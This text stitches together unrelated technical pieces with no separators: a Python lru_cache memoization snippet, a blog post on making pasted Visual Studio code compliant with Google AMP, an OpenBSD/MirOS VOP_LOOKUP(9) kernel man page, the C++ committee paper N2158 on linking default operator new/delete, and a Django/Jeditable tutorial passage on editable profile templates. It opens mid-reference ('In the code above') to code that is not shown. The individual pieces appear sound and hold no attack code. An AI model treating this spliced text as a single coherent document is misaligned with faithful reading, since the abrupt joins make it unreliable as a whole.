In the code above, maxsize indicates the number of calls to store. Setting it to None will make it so that there is no upper bound. The documentation recommends setting it equal to a power of two. Do note though that lru_cache does not make the execution of the lines in the function faster. It only stores the results of the function in a dictionary.
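To see the cache at work, here is a self-contained version of the example (note the recursive calls must refer to the memoized fib itself), followed by the cache statistics that lru_cache exposes via cache_info():

```python
from functools import lru_cache

@lru_cache(maxsize=2**7)
def fib(n):
    if n == 1:
        return 0
    if n == 2:
        return 1
    return fib(n - 1) + fib(n - 2)

print(fib(10))           # 34
print(fib.cache_info())  # CacheInfo(hits=7, misses=10, maxsize=128, currsize=10)
```

Without the cache, fib(10) would make dozens of redundant calls; with it, every value from fib(1) to fib(10) is computed exactly once.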
Google AMP: Code Snippets

It has happened to all of us. The standards change, we look at some older code we want to re-factor, and all of a sudden it's not compliant! Well, something happened with Google AMP. Here's one compliance issue that was easy to fix.

As I've been going through the site and optimizing it for Google AMP, I've experienced some interesting requirements from Google over the past months. But it hasn't been in vain. Based on the feedback from the Google Search Console, Google is starting to index my site for mobile pages. Good news, right? Well, kind of. Here's the rub... You may notice that I still have a lot of pages that aren't indexed. I finally figured out why.

My Code Is NOT Compliant

To my readers, I provide a lot of ASP.NET MVC code examples on DanylkoWeb. Every time I post a code technique, I provide code samples even with full-source projects. When I copy code from Visual Studio, I use the Productivity Power Tools 2015. It has a feature called Copy As HTML. I've been posting code samples for a long time. Actually, since my site was revived in 2014. But I've been doing it wrong... ...for almost two years. Let's get to the problem at hand instead of reminiscing.

Copying Code is NOT Copying Code

When you copy your code from Visual Studio, you make sure the code runs (not theoretically), highlight a section of code, and use the Copy As Html under the Edit menu. When you paste, your code becomes HTML readable for your readers. Let's look at an example.
When I use "Copy As Html" and paste this simple class into my editor, I get this:

HTML of MyClass

<pre class="csharpcode"><span style="color:blue;">public</span> <span style="color:blue;">class</span> <span style="color:#2b91af;">MyClass</span>{ <span style="color:blue;">public</span> <span style="color:blue;">string</span> FullName { <span style="color:blue;">get</span>; <span style="color:blue;">set</span>; }}</pre>

Looks like a mess, doesn't it? But did you notice the HTML? In-line styles! Oh, the horror! According to Google AMP's style requirements, inline styles are a no-no. So how do we fix this? Well, from this point on, we need to make our code AMP-compliant.

- In Visual Studio 2015, Select Tools -> Options (or go to Quick Launch and type 'tools options' and hit Enter).
- Click and expand the Productivity Power Tools option.
- Set the EmitSpanClass to True
- Set the EmitSpanStyle to False

What we did was change the pasting of your code to use CSS classes instead of inline styles. Here's what we get now:

MyClass

public class MyClass
{
    public string FullName { get; set; }
}

HTML of MyClass

<pre class="csharpcode"><span class="keyword">public</span> <span class="keyword">class</span> <span class="class name">MyClass</span> <span class="punctuation">{</span>
    <span class="keyword">public</span> <span class="keyword">string</span> <span class="identifier">FullName</span> <span class="punctuation">{</span> <span class="keyword">get</span><span class="punctuation">;</span> <span class="keyword">set</span><span class="punctuation">;</span> <span class="punctuation">}</span>
<span class="punctuation">}</span></pre>

Notice the classes? Definitely a better way of writing HTML. Now, your CSS can be color-coded easily.

Conclusion

Today, I explained another piece of the Google AMP puzzle by showing you how even pasted code could cause issues with HTML validators like Google's Structured Data Testing Tool.
As I continue to tackle Google AMP pages, I've come to realize that this will be the hardest part of converting my site to become Google AMP-compliant. I'm thinking that a good chunk of those 282 pages (pictured above) are code-related pages (Ugh!). It will be a long and tedious task. It may take me a while to convert them, but I wanted other developers who blog about code to understand the changes required to make their own pages Google AMP-compliant so they don't make the same mistakes as I did.
VOP_LOOKUP(9)                 BSD Kernel Manual                VOP_LOOKUP(9)

VOP_LOOKUP - vnode operations

#include <sys/vnode.h>

int VOP_CREATE(struct vnode *dvp, struct vnode **vpp, struct componentname *cnp, struct vattr *vap);
int VOP_FSYNC(struct vnode *vp, struct ucred *cred, int waitfor, struct proc *p);
int VOP_GETEXTATTR(struct vnode *vp, int attrnamespace, const char *name, struct uio *uio, size_t *size, struct ucred *cred, struct proc *p);
int VOP_ISLOCKED(struct vnode *);
int VOP_LINK(struct vnode *dvp, struct vnode *vp, struct componentname *cnp);
int VOP_LOCK(struct vnode *vp, int flags, struct proc *p);
int VOP_LOOKUP(struct vnode *dvp, struct vnode **vpp, struct componentname *cnp);
int VOP_MKDIR(struct vnode *dvp, struct vnode **vpp, struct componentname *cnp, struct vattr *vap);
int VOP_PRINT(struct vnode *vp);
int VOP_READLINK(struct vnode *vp, struct uio *uio, struct ucred *cred);
int VOP_REALLOCBLKS(struct vnode *vp, struct cluster_save *buflist);
int VOP_RECLAIM(struct vnode *vp, struct proc *p);
int VOP_REMOVE(struct vnode *dvp, struct vnode *vp, struct componentname *cnp);
int VOP_REVOKE(struct vnode *vp, int flags);
int VOP_RMDIR(struct vnode *dvp, struct vnode *vp, struct componentname *cnp);
int VOP_SETEXTATTR(struct vnode *vp, int attrnamespace, const char *name, struct uio *uio, struct ucred *cred, struct proc *p);
int VOP_STRATEGY(struct buf *bp);
int VOP_SYMLINK(struct vnode *dvp, struct vnode *vpp, struct componentname *cnp, struct vattr *vap, char *target);
int VOP_UNLOCK(struct vnode *vp, int flags, struct proc *p);
int VOP_WHITEOUT(struct vnode *dvp, struct componentname *cnp, int flags);

The VOP functions implement a generic way to perform operations on vnodes. The VOP function called passes the arguments to the correct file system specific function. Not all file systems implement all operations, in which case a generic method will be used.
These functions exist to provide an abstract method to invoke vnode operations without needing to know anything about the underlying file system. Many syscalls map directly to a specific VOP function.

The arguments for each VOP function consist of one or more vnode pointers along with other data needed to perform the operation. Care must be taken to obey the vnode locking discipline when using VOP functions. The locking discipline for all currently defined VOP functions is described in the file sys/kern/vnode_if.src. Many VOP calls take a struct proc *p argument. This should be the current process. VOP calls are not safe to call in an interrupt context.

The following sections comment on the VOP functions from the consumer's perspective. Some notes for file system implementors follow.

VOP_CREATE() creates a new directory entry for a regular file in the directory dvp and returns a locked, referenced vnode in vpp. The file name is in cnp and its permissions will be vap.

VOP_FSYNC() flushes any dirty buffers associated with vp to disk. The vnode is locked on entry and exit. waitfor can be set to MNT_WAIT to indicate VOP_FSYNC should not return until all data is written.

VOP_GETEXTATTR() and VOP_SETEXTATTR() are called to get and set named extended file attributes (see extattr(9)). vp is the vnode for which to get or set the attribute. It must be locked. attrnamespace is an integer describing whether the attribute belongs in the user or system namespace. name is the extended attribute to get or set. uio is a uio(9) structure with the userland address containing the userland data. VOP_GETEXTATTR will return the actual length of the attribute in size if it is non-NULL. cred is a pointer to the credentials used to access the file.

VOP_LINK() increases the link count for the vnode vp. A new entry with name cnp should be added to the directory dvp. dvp is locked on entry and unlocked on exit.
VOP_LOOKUP() finds the file corresponding to the name cnp in the directory dvp and returns a vnode in vpp. dvp is locked on entry and exit, and vpp is locked upon a successful return. vpp will be NULL on error, and cnp->cn_flags will be set to PDIRUNLOCK if dvp has been unlocked for an unsuccessful return.

VOP_MKDIR() implements the mkdir(2) syscall. A new directory with name matching that in cnp and with permissions vattr will be created in the directory dvp. On success, the new vnode is returned locked in vpp. dvp must be locked on entry and is unlocked on exit.

VOP_PRINT() prints information about the vnode to the kernel message buffer. It is not used normally, but exists only for debugging purposes.

VOP_READLINK() reads a symbolic link and returns the target's name in uio. vp is locked on entry and exit and must be a symlink.

VOP_REALLOCBLKS() is called by the vfs write clustering code. It gives the file system an opportunity to rearrange the on disk blocks for a file to reduce fragmentation. vp is the locked vnode for the file, and buflist is a cluster of the outstanding buffers about to be written. Currently, only FFS implements this call.

VOP_RECLAIM() is used by vclean(9) so that the file system has an opportunity to free memory and perform any other cleanup activity related to vp. vp is unlocked on entry and exit. VOP_RECLAIM should not be used by generic code.

VOP_REMOVE() removes the link named cnp from the directory dvp. This file corresponds to the vnode vp. Both dvp and vp are locked on entry and unlocked on exit, and each has its reference count decremented by one. VOP_REMOVE does not delete the file from disk unless its link count becomes zero (for file systems which support multiple links).

VOP_REVOKE() is used by the revoke(2) syscall to prevent any further access to a vnode. The vnode ops will be changed to those of deadfs, which returns only errors. vp must be unlocked.

VOP_RMDIR() implements the rmdir(2) syscall.
The directory vp will be removed from the directory dvp. Both are locked on entry and unlocked on exit. The name of the directory for removal is additionally contained in cnp.

VOP_STRATEGY() is the only VOP call not taking a vnode argument. It calls the appropriate strategy function for the device backing the buffer's vnode.

VOP_SYMLINK() creates a symbolic link with name cnp in the directory dvp with mode vap. The link will point to target and a vnode for it is returned in vpp. The directory vnode is locked on entry and unlocked on exit. Note that unlike most VOP calls returning a vnode, VOP_SYMLINK does not lock or reference vpp.

VOP_LOCK() is used internally by vn_lock(9) to lock a vnode. It should not be used by other file system code. VOP_UNLOCK() unlocks a vnode. flags should be zero in most cases. VOP_ISLOCKED() returns 1 if vp is locked and 0 if not. It should be used cautiously, as not all file systems implement locks effectively. Note the asymmetry between vn_lock and VOP_UNLOCK.

VOP_WHITEOUT() manipulates whiteout entries in a directory. dvp is the directory containing, or to contain, the whiteout. It is locked on entry and exit. cnp contains the name of the whiteout. flags is used to indicate the operation. Whiteouts may be created or deleted. A whiteout entry is normally used to indicate the absence of a file on a translucent file system.

The VOP functions are stubs which redirect their arguments to the appropriate function for each file system. In order to allow for layered file systems and generic bypass methods, all vnode operation implementing functions take only a single void * pointer as an argument. This points to a structure containing the real arguments. Additionally, this structure contains a struct vnodeop_desc *, or vnodeop description. The description is typically used by the abstract VOP code, but can be useful to the lower implementation as well.
Every file system defines an array of struct vnodeopv_entry_desc that contains one entry for each implemented vnode op. Unimplemented vnode operations match the default description, vop_default_desc. Most non-layer file systems should assign the default error handler, vn_default_error, to the generic description. All lower level implementations should conform to the interfaces described above. The rules for locking and referencing vnodes are enforced by each file system implementation, not the VOP stubs.

The VOP functions return 0 to indicate success and a non-zero error code to indicate failure.

sys/kern/vnode_if.src    source file containing VOP definitions
sys/kern/vnode_if.c      C file with implementations of each VOP stub call

errno(2), vn_lock(9), vnode(9)

This man page was written by Ted Unangst for OpenBSD.

The locking discipline is too complex. Refer to vn_lock(9).

MirOS BSD #10-current          March 9, 2003
This paper addresses the default implementation of the following 8 standard library functions:

void* operator new   (std::size_t size) throw(std::bad_alloc);
void  operator delete(void* ptr) throw();
void* operator new   (std::size_t size, const std::nothrow_t&) throw();
void  operator delete(void* ptr, const std::nothrow_t&) throw();
void* operator new   [](std::size_t size) throw(std::bad_alloc);
void  operator delete[](void* ptr) throw();
void* operator new   [](std::size_t size, const std::nothrow_t&) throw();
void  operator delete[](void* ptr, const std::nothrow_t&) throw();

Note that all 8 of the above functions are replaceable. And if all 8 are replaced, the requirements on those replacements are clear. What is less clear is the requirements and behavior if only a subset of the above 8 functions are replaced. Why do we care if only a subset of the 8 functions are replaced? Can't we just mandate that either none or all 8 of the above functions must be replaced? Yes, we could do that. In fact that is effectively what we have done since 1998. It isn't working. A common bug is: I've replaced sort with stable_sort as an internal implementation detail in my library. Why are a few of my clients now complaining that my library is causing memory corruption in their applications? The answer to this seemingly bizarre bug report is that stable_sort typically indirectly calls new(nothrow) followed by delete, while sort typically doesn't. When the client replaces operator new/delete but not the nothrow variants, stable_sort crashes whereas sort doesn't. This is just evil. This isn't an idle/rare occurrence. I am writing this paper today in response to yet another customer of mine coming to me with a complaint of this nature. My official answer is that there is a bug in the customer's code: He must replace all eight of these signatures, even if he only wants to replace two. However, my honest answer is that there is a bug in the standard.
This all centers on what the default implementations of these functions are required to do. That default implementation is very visible to clients, and incorrectly specified in C++03, and the current (N2135) working draft. In the discussion that follows, when I refer to an operator being replaced, I implicitly assume that the operator no longer directly references whatever memory pool the default operator references (which is typically malloc/free). For simplicity of discussion, the default operators reference the default memory pool, and client-replaced operators reference a distinct client-defined memory pool. It appears to me that if you replace:

void* operator new(std::size_t size) throw(std::bad_alloc);

Then you must also replace:

void operator delete(void* ptr) throw();

I think most people would immediately agree with this statement. If one doesn't link these two operators to the same underlying memory pool, then the delete will not be able to handle pointers that come from new. Furthermore I believe the same statement goes for the other 6 operators. Thus we can immediately separate these 8 functions into 4 cliques of 2 functions each. If you replace one function in a clique you must replace both:

Clique 1: operator new(std::size_t) and operator delete(void*)
Clique 2: operator new(std::size_t, const std::nothrow_t&) and operator delete(void*, const std::nothrow_t&)
Clique 3: operator new[](std::size_t) and operator delete[](void*)
Clique 4: operator new[](std::size_t, const std::nothrow_t&) and operator delete[](void*, const std::nothrow_t&)

But now the next question is: What happens if I replace clique 1 and not clique 2? Or what happens if I replace clique 1 and not clique 3? etc. To answer the above question we need to look more closely at the requirements. For example the requirements for both the nothrow and ordinary (but non-array) versions of operator delete are:

Requires: the value of ptr is null or the value returned by an earlier call to the default operator new(std::size_t) or operator new(std::size_t, const std::nothrow_t&).

OK, so we have a problem right here: These words say that if you replace cliques 1 and 2, then your replaced operator deletes must handle pointers allocated from the default operator new! That can't be right.
Surely we mean that if someone replaces cliques 1 and 2, the delete operators in those cliques need only handle pointers from the replaced new operators in those cliques. What did that Requires: clause intend to say? To find out, let's look at an example use case of operator new(nothrow):

A* ap = new(std::nothrow) A;
...
delete ap;

Right! Clients of new(std::nothrow) are expected to be able to delete those pointers with a simple (non-nothrow) delete. And more generally, the delete operators in cliques 1 and 2 are expected to be able to delete the pointers from the new allocators in cliques 1 and 2. And similarly for cliques 3 and 4. This means that cliques 1 and 2 really form a single group of functions that all refer to the same underlying pool of memory. Similarly for cliques 3 and 4. We can call these two groups A and B:

Group A: cliques 1 and 2
Group B: cliques 3 and 4

However the above table does not imply that one must implement every signature in a group. It only implies that each signature in a group must refer to the same underlying memory pool. Is there anything the standard can do to make it easy for functions in the same group to refer to the same memory pool, and difficult for them not to? Yes! Consider this proposed default implementation of the signatures in clique 2:

void* operator new(std::size_t size, const std::nothrow_t&) throw()  // clique 2
{
    try
    {
        return operator new(size);  // forward to clique 1
    }
    catch (...)
    {
    }
    return 0;
}

void operator delete(void* ptr, const std::nothrow_t&) throw()  // clique 2
{
    operator delete(ptr);  // forward to clique 1
}

With the above default implementation, all the client has to do to replace group A is to just replace the two signatures in clique 1. Since clique 2 forwards to clique 1 (replaced or not), clique 2 is always linked to clique 1 as it should be. The client can still replace clique 2 if desired. However there is little point in doing so.
It must remain linked to clique 1, and not doing so will result in a run time error when delete is called with a pointer from new(nothrow). There is no advantage in easily allowing clique 2 to become unlinked from clique 1. And there is every advantage in actively discouraging cliques 1 and 2 from becoming unlinked. They must be linked or a run time crash is inevitable. Everything I've said about the relationship between cliques 1 and 2 also applies to cliques 3 and 4. Cliques 3 and 4 must always be linked. That implies that the proper default implementation of clique 4 simply forwards to clique 3:

void* operator new[](std::size_t size, const std::nothrow_t&) throw()  // clique 4
{
    try
    {
        return operator new[](size);  // forward to clique 3
    }
    catch (...)
    {
    }
    return 0;
}

void operator delete[](void* ptr, const std::nothrow_t&) throw()  // clique 4
{
    operator delete[](ptr);  // forward to clique 3
}

The above is the bare minimum the standard must do in order to keep the standard library from being extremely fragile. We have now established firm reasoning for why clique 2 should forward to clique 1, and clique 4 should forward to clique 3. But should we (by default) link groups A and B by having clique 3 forward to clique 1? I.e. implement the array operators in terms of the non-array operators. I believe that this is the question actually originally answered in LWG 206. Note that the actual question of LWG 206 was the issue of linking the nothrow and throwing versions of the operators as discussed in the previous sections. They must not become unlinked. However the same is not true of array vs non-array. The reason groups A and B do not have to be linked is because the delete operators in group A never have to deal with pointers from the new operators in group B. Similarly the delete operators in group B never have to deal with pointers from the new operators in group A.
Thus if the groups refer to different underlying memory pools (become unlinked), no harm (as in crashing) is done. The original 1998 and 2003 C++ standards partially link groups A and B. The default operator new[] is specified to call operator new. However the operator delete[] does not have the corresponding specification to call operator delete. LWG 298 corrects that inconsistency by specifying operator delete[] calls operator delete. Thus the current (N2135) working draft links groups A and B. The following test was run on various compilers and platforms. It detects whether groups A and B are linked or not by replacing the non-array operators, and then calling the array operators and observing if the replaced operators are called or not.

#include <cstdio>
#include <cstdlib>
#include <new>

void* operator new(std::size_t size) throw(std::bad_alloc)
{
    std::printf("custom allocation\n");
    if (size == 0)
        size = 1;
    void* p = std::malloc(size);
    if (p == 0)
        throw std::bad_alloc();
    return p;
}

void operator delete(void* ptr) throw()
{
    std::printf("custom deallocation\n");
    std::free(ptr);
}

int main()
{
    std::printf("begin main\n");
    int* i = new int;
    delete i;
    std::printf("---\n");
    int* a = new int[3];
    delete [] a;
    std::printf("end main\n");
}

The following tools indicated complete linkage between groups A and B: The following tools indicated no linkage between groups A and B: The following tool indicated inconsistent linkage between groups A and B: Given that the current (N2135) working draft and several (prominent) compilers currently link groups A and B, this paper recommends to not change the current (N2135) working draft (with respect to A/B linkage) and thus continue linking groups A and B.
The default implementation of the clique 3 operators should forward to clique 1:

    void* operator new[](std::size_t size) throw(std::bad_alloc)  // clique 3
    {
        return operator new(size);  // forward to clique 1
    }

    void operator delete[](void* ptr) throw()  // clique 3
    {
        operator delete(ptr);  // forward to clique 1
    }

With the above recommendations, clients will be able to replace both groups A and B by simply replacing clique 1. Indeed, this is the most common intention of replacing the new and delete operators. If clients wish to treat array allocations differently from non-array allocations, the client can still safely and easily unlink groups A and B by replacing both cliques 1 and 3, and have them refer to different memory pools. There is little motivation for replacing cliques 2 or 4, but of course that is still allowed by this proposal as long as the replacements continue to link to cliques 1 and 3 respectively.

Proposed wording to accomplish the recommendations of this paper is provided below. The differences are with respect to the current (N2135) working draft.

Change 18.5.1.1 [new.delete.single]:

may define a function with this function signature that displaces the default version defined by the C++ Standard library.

-7- Required behavior: Return a non-null pointer to suitably aligned storage (3.7.4), or else return a null pointer. This nothrow version of operator new returns a pointer obtained as if acquired from the ordinary version. This requirement is binding on a replacement version of this function.

-8- Default behavior:
- Executes a loop: Within the loop, the function first attempts to allocate the requested storage. Whether the attempt involves a call to the Standard C library function malloc is unspecified.
- Returns a pointer to the allocated storage if the attempt is successful. Otherwise, if the last argument to set_new_handler() was a null pointer, return a null pointer.
- Otherwise, the function calls the current new_handler (18.5.2.2).
If the called function returns, the loop repeats.
- The loop terminates when an attempt to allocate the requested storage is successful or when a called new_handler function does not return. If the called new_handler function terminates by throwing a bad_alloc exception, the function returns a null pointer.

-9- [Example:

    T* p1 = new T;           // throws bad_alloc if it fails
    T* p2 = new(nothrow) T;  // returns 0 if it fails

--end example]

    void operator delete(void* ptr) throw();
    void operator delete(void* ptr, const std::nothrow_t&) throw();

-10- Effects: The deallocation function (3.7.4.2) called by a delete-expression to render the value of ptr invalid.

-11- Replaceable: a C++ program may define a function with this function signature that displaces the default version defined by the C++ Standard library.

-12- Requires: the value of ptr is null or the value returned by an earlier call to the default operator new(std::size_t) or operator new(std::size_t, const std::nothrow_t&).

-13- Default behavior:
- For a null value of ptr, do nothing.
- Any other value of ptr shall be a value returned earlier by a call to the default operator new, which was not invalidated by an intervening call to operator delete(void*) (17.4.3.7). For such a non-null value of ptr, reclaims storage allocated by the earlier call to the default operator new.

-14- Remarks: It is unspecified under what conditions part or all of such reclaimed storage is allocated by a subsequent call to operator new or any of calloc, malloc, or realloc, declared in <cstdlib>.

Change 18.5.1.2 [new.delete.array]:

can define a function with this function signature that displaces the default version defined by the C++ Standard library.

-7- Required behavior: Same as for operator new(std::size_t, const std::nothrow_t&). This nothrow version of operator new[] returns a pointer obtained as if acquired from the ordinary version.

-8- Default behavior: Returns operator new(size, nothrow).
    void operator delete[](void* ptr) throw();
    void operator delete[](void* ptr, const std::nothrow_t&) throw();

-9- Effects: The deallocation function (3.7.4.2) called by the array form of a delete-expression to render the value of ptr invalid.

-10- Replaceable: a C++ program can define a function with this function signature that displaces the default version defined by the C++ Standard library.

-11- Requires: the value of ptr is null or the value returned by an earlier call to operator new[](std::size_t) or operator new[](std::size_t, const std::nothrow_t&).

-12- Default behavior: Calls operator delete(ptr) or operator delete(ptr, std::nothrow) respectively.

I would like to thank David Harmon, Rahtgaz, and Alexey Sarytchev for help in surveying existing practice.
http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2158.html
This will allow us to create a results page as shown:

When someone clicks OK, the data is saved on the server, and also shown on the page. Let's get started on how this works.

Including a plugin

We include a jQuery plugin on a page by including jQuery, then including the plugin (or plugins, if we have more than one). In our base.html, we update:

    {% block footer_javascript_site %}
    <script language="JavaScript" type="text/javascript"
        src="/static/js/jquery.js"></script>
    <script language="JavaScript" type="text/javascript"
        src="/static/js/jquery-ui.js"></script>
    <script language="JavaScript" type="text/javascript"
        src="/static/js/jquery.jeditable.js"></script>
    {% endblock footer_javascript_site %}

This is followed by the footer_javascript_section and footer_javascript_page blocks. This means that if we don't want the plugin, which is the last inclusion, to be downloaded for each page, we could put it in overridden section and page blocks. This would still render as including the plugin after jQuery.

How to make pages more responsive

We should also note that this setup, with three JavaScript downloads, is appropriate for development purposes but not for deployment. In terms of YSlow client-side performance optimization, the recommended best practice is to have one HTML/XHTML hit, one CSS hit at the top, and one JavaScript hit at the bottom. One of the basic principles of client-side optimization, discussed by Steve Souders, is that since HTTP requests slow the page down, the recommended best practice is to have one (preferably minified) CSS inclusion at the top of the page, and one (preferably minified) JavaScript inclusion at the bottom of each page. Each HTTP request beyond this makes things slower, so combining CSS and/or JavaScript requests into a single concatenated file is low-hanging fruit to improve how quick and responsive your web pages appear to users. For deployment, we should minify and combine the JavaScript.
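As a sketch of that deployment step (the file names and contents below are placeholders standing in for the real scripts, and a tool such as terser or uglifyjs would stand in for whatever minifier you use), the combining itself is just concatenation in the order the pages already load them:

```shell
#!/bin/sh
# Combine the development-time scripts into one deployable file.
# The file names and contents are illustrative; substitute your real paths.
mkdir -p static/js build
printf '%s\n' 'var a = 1;'     > static/js/jquery.js
printf '%s\n' 'var b = 2;'     > static/js/jquery-ui.js
printf '%s\n' 'var c = a + b;' > static/js/jquery.jeditable.js

cat static/js/jquery.js \
    static/js/jquery-ui.js \
    static/js/jquery.jeditable.js > build/combined.js

# A real deployment would now minify the bundle, e.g.:
#   terser build/combined.js -o build/combined.min.js
wc -l < build/combined.js
```

The base template would then reference build/combined.js (or its minified sibling) in a single script tag.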
As we are developing, we also have JavaScript included in templates and rendered into the delivered XHTML; this may be appropriate for development purposes. For deployment though, as much shared functionality as possible should be factored out into an included JavaScript file. For content that can be delivered statically, such as CSS, JavaScript, and even non-dynamic images, setting far-future Expires/Cache-Control headers is desirable. (One practice is to never change the content of a published URL for the kind of content that has a far-future expiration set; if it needs updating, instead of changing the content at the same location, leave the content where it is, publish at a new location, possibly including a version number, and reference the new location.)

A template handling the client-side requirements

Here's the template. Its view will render it with an entity and other information. At present it extends the base directly; it is desirable in many cases to have the templates that are rendered extend section templates, which in turn extend the base. In our simple application, we have two templates which are directly rendered to web pages. One is the page that handles both search and search results, and the other is the page that handles a profile, from the following template:

    {% extends "base.html" %}

Following earlier discussion, we include honorifics before the name, and post-nominals after. At this point we do not do anything to make it editable.

    {% block head_title %}
    {{ entity.honorifics }}
    {{ entity.name }}
    {{ entity.post_nominals }}
    {% endblock head_title %}

    {% block body_main %}

There is one important point about Django and the title block.
The Django developers do not find it acceptable to write a templating engine that produces errors in production if someone attempts to access an undefined value (by typos, for instance). As a result of this design decision, if you attempt to access an undefined value, the templating engine will silently insert an empty string and move on. This means that it is safe to include a value that may or may not exist, although there are ways to test if a value exists and is nonempty, and display another default value in that case. We will see how to do this soon.

Let's move on to the main block, defined by the last line of code. Once we are in the main block, we have an h1 which is almost identical to the title block, but this time it is marked up to support editing in place. Let us look at the honorifics span; the name and post_nominals spans work the same way:

    <h1>
        <span id="Entity_honorifics_{{ entity.id }}" class="edit">
            {% if entity.honorifics %}
                {{ entity.honorifics }}
            {% else %}
                Click to edit.
            {% endif %}
        </span>

The class edit is used to give all $(".edit") items some basic special treatment with Jeditable; there is nothing magical about the class name, which could have been replaced by user-may-change-this or something else. edit merely happens to be a good name choice, like almost any good variable/function/object name.

We create a naming convention in the span's HTML ID which will enable the server side to know which, of a long and possibly open-ended number of things we could intend to change, is the one we want. In a nutshell, the convention is modelname_fieldname_instanceID. The first token is the model name, and is everything up to the first underscore. (Even if we were only interested in one model now, it is more future proof to design so that we can accommodate changes that introduce more models.) The last token is the instance ID, an integer. The middle token, which may contain underscores (for example post_nominals in the following code), is the field name.
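The convention can be taken apart with a single regular expression. Here is a self-contained sketch of the parsing (the helper name is mine; the regex is the same one the server-side view uses later in this chapter):

```python
import re

def parse_editable_id(html_id):
    """Split modelname_fieldname_instanceID into its three parts.

    The model name runs up to the first underscore, the instance ID is
    the trailing integer, and the field name (which may itself contain
    underscores) is everything in between.
    """
    match = re.match(r'^(.*?)_(.*)_(\d+)$', html_id)
    if match is None:
        raise ValueError('not an editable id: %r' % html_id)
    model, field, instance_id = match.groups()
    return model, field, int(instance_id)

print(parse_editable_id('Entity_post_nominals_42'))
# -> ('Entity', 'post_nominals', 42)
```

The lazy `(.*?)` stops at the first underscore, and anchoring `(\d+)$` at the end claims the trailing integer, so underscores inside the field name cause no ambiguity.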
There is no specific requirement to follow a naming convention, but it allows us to specify an HTML ID that the server-side view can parse for information about which field on which instance of which model is being edited. We also provide a default value, in this case Click to edit, intended not only to serve as a placeholder, but to give users a sense of how this information can be updated.

We might also observe that here and in the following code, we do not presently have checks against race conditions in place, so nothing here or in the following code will stop users from overwriting each others' changes. This may be taken as a challenge to refine and extend the solution to either prevent race conditions or mitigate their damage.

        <span id="Entity_name_{{ entity.id }}" class="edit">
            {% if entity.name %}
                {{ entity.name }}
            {% else %}
                Click to edit.
            {% endif %}
        </span>
        <span id="Entity_post_nominals_{{ entity.id }}" class="edit">
            {% if entity.post_nominals %}
                {{ entity.post_nominals }}
            {% else %}
                Click to edit.
            {% endif %}
        </span>
    </h1>

Taken together, the three statements form the heading in this screenshot:

If we click on the name (for instance) it becomes:

The image is presently a placeholder; this should be expanded to allow an image to be uploaded if the user clicks on the picture (implementing consistent-feeling behavior whether or not we do so via the same plugin).

This approach is an excellent first approach, but in practice it yields an h1 with three slots that say Click to edit on a profile, creating needless confusion. We move to a simplified:

    <h1 class="edit" id="Entity_name_{{ entity.id }}">
        {{ entity.name }}
    </h1>

We also need the view and urlpattern on the backend.

The bulk of the profile

For small bits of text, we use the edit CSS class, which will be transformed to an input of type text on click (or double-click or mouseover, if we were using Jeditable differently). The description is an example of something that would more naturally lend itself to a textarea, so we will use the edit_textarea CSS class, which will be configured to use a textarea.

    {% if entity.image %}
        <img src="/images/{{ entity.id }}" alt="{{ entity.name }}">
    {% endif %}

The Department, as well as the Reports to field, are not arbitrary text in our implementation; they are another entity (if one is specified). This could appropriately enough be implemented as a dropdown menu, but even a carefully pruned dropdown menu could be long and unwieldy for a large company.

One additional note on usability: When displaying "label: value" information on pages, particularly heavily used pages, the most basic option is not to use any emphasis:

    Name: J. Smith

To help people's eyes find what they want, one obvious solution is to emphasize the label, as in:

    Name: J. Smith

This works well the first time. However, if people are looking at the same set of fields, in the same order, on a web page they visit repeatedly, it is no longer best to emphasize the labels. Regular visitors already know what the labels are, and the motive for even looking at the labels is to see the value. Therefore, for our directory, we will be using bold for the value rather than the label:

    Name: J. Smith

    <p>
        Description
        <strong id="Entity_description_{{ entity.id }}" class="edit_textarea">
            {{ entity.description }}
        </strong>
    </p>

If a homepage is defined, we give the URL, wrapped in a link and a strong that makes the link editable by right clicking.
If the link were just editable by a regular click, Jeditable would short-circuit the usual and expected behavior of clicking on a link taking you to the corresponding page or opening the corresponding e-mail. To allow editing while also allowing normal use of links on a profile page, we assign the right click rather than click event to be the way to trigger editing. From a UI consistency perspective, it might be desirable to additionally always allow a right click to trigger any (possible) editing. However, we will leave that on our wishlist for now. We will define JavaScript later on in this chapter that will add the desired behavior.

Whitespace and delivery

The formatting used above is preferable for development; for actual delivery, we may wish to strip out all whitespace that can be stripped out, for this page:

    <p>Department:
        <strong>
            {{ entity.department.name }}
        </strong>
    </p>
    <p>Homepage:
        {% if entity.homepage %}
            <a href="{{ entity.homepage }}">
        {% endif %}
        <strong class="edit_rightclick" id="Entity_homepage_{{ entity.id }}">
            {% if entity.homepage %}
                {{ entity.homepage }}
            {% else %}
                Right click to change.
            {% endif %}
        </strong>
        {% if entity.homepage %}
            </a>
        {% endif %}
    </p>

Some browsers now are better about this, but it has happened in the past that if you have whitespace such as a line break between the intended text of a link and the tag, you could get unwanted trailing whitespace with a visible underline on the rendered link. In addition, pages load faster if minified. For development purposes, though, we will add whitespace for clarity.
In the next code, we will have a spurious space before rendered commas because we are not stripping out unnecessary whitespace:

    {% if entity.homepage %}<a href="{{ entity.homepage }}">{% endif %}<strong class="edit_rightclick" id="entity_homepage_{{ entity.id }}">{% if entity.homepage %}{{ entity.homepage }}{% else %}Right click to change.{% endif %}</strong>{% if entity.homepage %}</a>{% endif %}<br />

    <p>Email:
        <strong>
            {% for email in emails %}
                <a id="EntityEmail_email_{{ email.id }}" class="edit_rightclick"
                        href="mailto:{{ email.email }}">
                    {{ email.email }}
                </a>
                {% if not forloop.last %}
                    ,
                {% endif %}
            {% endfor %}
            <span class="edit" id="EntityEmail_new_{{ entity.id }}">
                Click to add email.
            </span>
        </strong>
    </p>

This allows e-mails to be added, like so:

For the Location field, we are deferring an intelligent way to let people choose an existing location, or create a new one, until the next chapter. For now we simply display a location's identifier, which is meant as a human-readable identifier rather than a machine-readable primary key or other identifier:

    <p>Location:
        <strong>
            {{ entity.location.identifier }}
        </strong>
    </p>

This entails a change to the Location model, to allow:

    class Location(models.Model):
        identifier = models.TextField(blank = True)
        description = models.TextField(blank = True)
        office = models.CharField(max_length = 2,
            choices = OFFICE_CHOICES, blank = True)
        room = models.TextField(blank = True)
        coordinates = GPSField(blank = True)

The Phone field is the last one that is user editable:

    <p>Phone:
        <strong class="edit" id="Entity_phone_{{ entity.id }}">
            {% if entity.phone %}
                {{ entity.phone }}
            {% else %}
                Click to edit.
            {% endif %}
        </strong>
    </p>

